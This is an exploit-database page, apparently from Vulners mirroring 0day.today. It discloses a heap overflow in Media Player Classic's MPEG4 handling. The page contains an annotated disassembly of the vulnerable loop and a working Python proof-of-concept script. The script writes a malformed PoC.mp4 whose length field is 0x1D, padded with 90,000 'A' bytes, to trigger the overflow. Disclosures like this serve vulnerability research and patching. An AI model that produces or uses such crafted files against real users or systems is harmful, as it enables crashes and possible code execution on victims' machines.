Lucene search
K

Media player Classic .MPEG4 Heap overflow Vulnerability

🗓️ 26 Sep 2012 00:00:00Reported by Senator of PiratesType 
zdt
 zdt
🔗 0day.today👁 18 Views

Media player Classic .MPEG4 heap overflow vulnerability due to a loop in sub_009F76B0 function causing overflow

Code
# Title : Media player Classic .MPEG4 Heap overflow Vulnerability
# Auther : Senator of Pirates (Khalil Zhani)
# FaceBook : /SenatorofPiratesInfo
# E-Mail : Senator.of.Pirates.team[at]gmail.com
# Greeting : To my best friend Mr. Marshal Webb

bug :
----

The vulnerability is caused due to an heap overflow error, in sub_009F76B0 function there is loop which if the lenght size was individual value like 0x1D the loop will continues and then overflow will happen.

009F76B0  /$ 6A FF          PUSH -1
009F76B2  |. 68 9372D000    PUSH mpc-hc.00D07293
009F76B7  |. 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]
009F76BD  |. 50             PUSH EAX
009F76BE  |. 53             PUSH EBX
009F76BF  |. 55             PUSH EBP
009F76C0  |. 56             PUSH ESI
009F76C1  |. 57             PUSH EDI
009F76C2  |. A1 7007DC00    MOV EAX,DWORD PTR DS:[DC0770]
009F76C7  |. 33C4           XOR EAX,ESP
009F76C9  |. 50             PUSH EAX
009F76CA  |. 8D4424 14      LEA EAX,DWORD PTR SS:[ESP+14]
009F76CE  |. 64:A3 00000000 MOV DWORD PTR FS:[0],EAX
009F76D4  |. 8B6C24 30      MOV EBP,DWORD PTR SS:[ESP+30]
009F76D8  |. 8B7C24 24      MOV EDI,DWORD PTR SS:[ESP+24]
009F76DC  |. 8B4424 2C      MOV EAX,DWORD PTR SS:[ESP+2C]
009F76E0  |. 8B5C24 28      MOV EBX,DWORD PTR SS:[ESP+28]     # length size 8 bits
...
009F773D  |. 8B4424 2C      MOV EAX,DWORD PTR SS:[ESP+2C]
009F7741  |. 83C3 F0        ADD EBX,-10                       # length size 8 bits -10
009F7744  |. 83D0 FF        ADC EAX,-1
009F7747  |. 8BCB           MOV ECX,EBX
009F7749  |. 0BC8           OR ECX,EAX
009F774B  |. 894424 2C      MOV DWORD PTR SS:[ESP+2C],EAX
009F774F  |. 74 45          JE SHORT mpc-hc.009F7796
009F7751  |> 8B55 00        /MOV EDX,DWORD PTR SS:[EBP]           # beginning of loop  ;  mpc-hc.004F9DA4
009F7754  |. 8B52 18        |MOV EDX,DWORD PTR DS:[EDX+18]
009F7757  |. 8D4424 30      |LEA EAX,DWORD PTR SS:[ESP+30]
009F775B  |. 50             |PUSH EAX
009F775C  |. 8BCD           |MOV ECX,EBP
009F775E  |. FFD2           |CALL EDX
009F7760  |. 8B46 08        |MOV EAX,DWORD PTR DS:[ESI+8]
009F7763  |. 40             |INC EAX
009F7764  |. 3B46 04        |CMP EAX,DWORD PTR DS:[ESI+4]
009F7767  |. 76 09          |JBE SHORT mpc-hc.009F7772
009F7769  |. E8 82DAFFFF    |CALL mpc-hc.009F51F0
009F776E  |. 85C0           |TEST EAX,EAX
009F7770  |. 75 10          |JNZ SHORT mpc-hc.009F7782
009F7772  |> 8B4E 08        |MOV ECX,DWORD PTR DS:[ESI+8]
009F7775  |. 8B56 0C        |MOV EDX,DWORD PTR DS:[ESI+C]
009F7778  |. 8B4424 30      |MOV EAX,DWORD PTR SS:[ESP+30]
009F777C  |. 89048A         |MOV DWORD PTR DS:[EDX+ECX*4],EAX    # overflows
009F777F  |. FF46 08        |INC DWORD PTR DS:[ESI+8]           
009F7782  |> 8B4424 2C      |MOV EAX,DWORD PTR SS:[ESP+2C]
009F7786  |. 83C3 FC        |ADD EBX,-4                          # length size 8 bits -10 (here the reason of bug if the value is individual 0x1D)
009F7789  |. 83D0 FF        |ADC EAX,-1
009F778C  |. 8BCB           |MOV ECX,EBX                        
009F778E  |. 0BC8           |OR ECX,EAX                         
009F7790  |. 894424 2C      |MOV DWORD PTR SS:[ESP+2C],EAX
009F7794  |.^75 BB          \JNZ SHORT mpc-hc.009F7751           # end of loop

PoC :
----

poc = ("\x00\x00\x00\x1D\x66\x74\x79\x70\x6D\x70\x34\x32\x00\x00\x00\x00\x69\x73\x6F\x6D\x61\x76"
"\x63\x31\x6D\x70\x34\x32\x00\x01\xAA\x71\x6D\x6F\x6F\x76\x00\x00\x00\x6C\x6D\x76\x68\x64"
"\x00\x00\x00\x00\xC4\x92\x34\x4F\xC4\x92\x34\x4F\x00\x00\x02\x58\x00\x02\xFB\xAC\x00\x01"
"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x15\x69\x6F\x64\x73\x00\x00"
"\x00\x00\x10\x07\x00\x4F\xFF\xFF\x29\x15\xFF\x00\x00\xE7\x91\x74\x72\x61\x6B\x00\x00\x00"
"\x5C\x74\x6B\x68\x64\x00\x00\x00\x01\xC4\x92\x34\x4F\xC4\x92\x34\x50\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x02\xFB\xA5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00"
"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\xE7\x2D\x6D\x64\x69\x61\x00\x00\x00\x20\x6D\x64\x68\x64\x00\x00\x00\x00\xC4"
"\x92\x34\x4F\xC4\x92\x34\x50\x00\x00\xAC\x44\x00\xDB\x40\x00\x55\xC4\x00\x00\x00\x00\x00"
"\x42\x68\x64\x6C\x72\x00\x00\x00\x00\x00\x00\x00\x00\x73\x6F\x75\x6E\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00");
poc += "\x41" * 90000

try:
    A = open("PoC.mp4","wb")    
    A.write(poc)
    A.close()
    print "[*] The file created [*]"
except:
    print "[*] Error while creating file [*]"
 
print "[*] Enter to continue.. [*]"
raw_input()



#  0day.today [2018-03-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation